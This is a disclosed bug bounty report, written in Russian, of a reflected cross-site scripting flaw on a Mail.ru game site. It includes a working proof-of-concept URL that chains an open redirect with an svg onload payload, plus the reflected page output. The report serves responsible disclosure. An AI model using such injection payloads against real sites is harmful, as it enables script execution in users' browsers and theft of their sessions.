ReportLink:https://hackerone.com/reports/66423
WeaknessName:Cross-site Scripting (XSS) - Generic
Reporter:https://hackerone.com/bobrov
ReportedTo:Mail.ru(mailru)
BountyAmount:
Severity:
State:Closed
DateOfDisclosure:06.10.2016 12:22:36

Summary:

Открыть с помощью Internet Explorer 
(для формирования правильного запроса используется баг перенаправления, поэтому необходим сценарий "bf.am/x?r=")
```
http://bf.am/x?r=https://tanks.mail.ru/"><svg/onload=alert(document.domain)>/%252e%252e/%252e%252e/
```
Результат:
```
<meta property="og:url" content="http://tanks.mail.ru/"><svg/onload=alert(document.domain)>/%2e%2e/%2e%2e/" />
...
<div id="shareToolbox" class="b-likes__inner" data-url="http://tanks.mail.ru/"><svg/onload=alert(document.domain)>/%2e%2e/%2e%2e/" data-title="Страница не найдена - Ошибка 404
```